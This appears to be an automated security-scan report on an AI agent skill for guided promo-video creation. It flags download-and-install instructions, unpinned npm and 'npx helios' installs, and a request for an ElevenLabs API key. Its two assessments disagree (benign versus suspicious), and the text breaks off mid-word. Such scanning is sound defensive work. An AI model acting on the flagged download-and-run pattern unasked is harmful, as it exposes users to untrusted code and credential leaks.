guided-promo-video

[Skill Scanner] Natural language instruction to download and install from URL detected All findings: [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [HIGH] supply_chain: Installation of third-party script detected (SC006) [AITech 9.1.4] The analyzed fragment is purpose-aligned and proportionate for a promo-video automation workflow. It relies on user input and standard external services (ElevenLabs, Helios CLI) with normal credential handling expectations. No evidence of data exfiltration, unauthorized control, or suspicious network activity was found. Treat as BENIGN with MEDIUM risk due to external API usage requiring proper credential management and channel-secure communications. LLM verification: The skill’s stated purpose (guided promo-video creation) matches its capabilities, but it contains multiple supply-chain risk patterns: unpinned npm installs and direct instructions to install/run third-party tooling (npx helios), and an explicit flow that asks users to provide an ELEVEN_LABS_API_KEY (sensitive credential). These are not definitive signs of malware, but they do create a meaningful attack surface (download-and-execute, potential credential exposure). Treat this skill as suspiciou